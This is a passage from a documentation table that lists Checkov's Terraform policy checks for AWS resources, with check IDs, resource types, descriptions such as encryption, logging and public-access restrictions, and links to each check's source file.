aws_elasticache_security_group | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 74 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security groups rule has a description | Terraform | 
[SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 75 | CKV_AWS_23 | resource | aws_security_group | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 76 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 77 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 78 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security groups rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 79 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 80 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 81 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security 
groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 82 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 83 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 84 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 85 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | -| 86 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | -| 87 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | -| 88 | CKV_AWS_29 | resource | 
aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 89 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 90 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 91 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | -| 92 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | -| 93 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 94 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at 
rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | -| 95 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | -| 96 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | -| 97 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | -| 98 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | -| 99 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 100 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) 
| Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 101 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 102 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | -| 103 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | -| 104 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 105 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 106 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 107 | CKV_AWS_46 | resource | aws_instance | Ensure no 
hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 108 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 109 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 110 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | -| 111 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | -| 112 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | -| 113 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | -| 114 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | -| 115 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | 
Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | -| 116 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | -| 117 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | -| 118 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | -| 119 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 120 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. 
| Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 121 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | -| 122 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | -| 123 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | -| 124 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | -| 125 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 126 | CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 127 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges 
are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 128 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 129 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 130 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 131 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 132 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 133 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 134 | CKV_AWS_63 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 135 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | -| 136 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | -| 137 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | -| 138 | CKV_AWS_67 | resource | aws_cloudtrail | Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) | -| 139 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) | -| 140 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) | -| 141 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any 
Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 142 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) | -| 143 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) | -| 144 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) | -| 145 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) | -| 146 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) | -| 147 | CKV_AWS_75 | resource | aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) | -| 148 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | 
[APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 149 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) | -| 150 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) | -| 151 | CKV_AWS_78 | resource | aws_codebuild_project | Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) | -| 152 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 153 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 154 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) | -| 155 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) | -| 156 | 
CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | -| 157 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 158 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 159 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 160 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 161 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 162 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | -| 163 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront 
distribution has Access Logging enabled | Terraform | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 164 | CKV_AWS_87 | resource | aws_redshift_cluster | Redshift cluster should not be publicly accessible | Terraform | [RedshitClusterPubliclyAvailable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py) | -| 165 | CKV_AWS_88 | resource | aws_instance | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 166 | CKV_AWS_88 | resource | aws_launch_template | EC2 instance should not have public IP. | Terraform | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2PublicIP.py) | -| 167 | CKV_AWS_89 | resource | aws_dms_replication_instance | DMS replication instance should not be publicly accessible | Terraform | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 168 | CKV_AWS_90 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB TLS is not disabled | Terraform | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBTLS.py) | -| 169 | CKV_AWS_91 | resource | aws_alb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 170 | CKV_AWS_91 | resource | aws_lb | Ensure the ELBv2 (Application/Network) has access logging enabled | Terraform | 
[ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py) | -| 171 | CKV_AWS_92 | resource | aws_elb | Ensure the ELB has access logging enabled | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py) | -| 172 | CKV_AWS_93 | resource | aws_s3_bucket | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 173 | CKV_AWS_93 | resource | aws_s3_bucket_policy | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes) | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py) | -| 174 | CKV_AWS_94 | resource | aws_glue_data_catalog_encryption_settings | Ensure Glue Data Catalog Encryption is enabled | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 175 | CKV_AWS_96 | resource | aws_rds_cluster | Ensure all data stored in Aurora is securely encrypted at rest | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py) | -| 176 | CKV_AWS_97 | resource | aws_ecs_task_definition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 177 | CKV_AWS_98 | resource | aws_sagemaker_endpoint_configuration | Ensure all data stored in the 
Sagemaker Endpoint is securely encrypted at rest | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py) | -| 178 | CKV_AWS_99 | resource | aws_glue_security_configuration | Ensure Glue Security Configuration Encryption is enabled | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py) | -| 179 | CKV_AWS_100 | resource | aws_eks_node_group | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 180 | CKV_AWS_101 | resource | aws_neptune_cluster | Ensure Neptune logging is enabled | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py) | -| 181 | CKV_AWS_102 | resource | aws_neptune_cluster_instance | Ensure Neptune Cluster instance is not publicly available | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py) | -| 182 | CKV_AWS_103 | resource | aws_alb_listener | Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | -| 183 | CKV_AWS_103 | resource | aws_lb | Ensure that load balancer is using at least TLS 1.2 | Terraform | 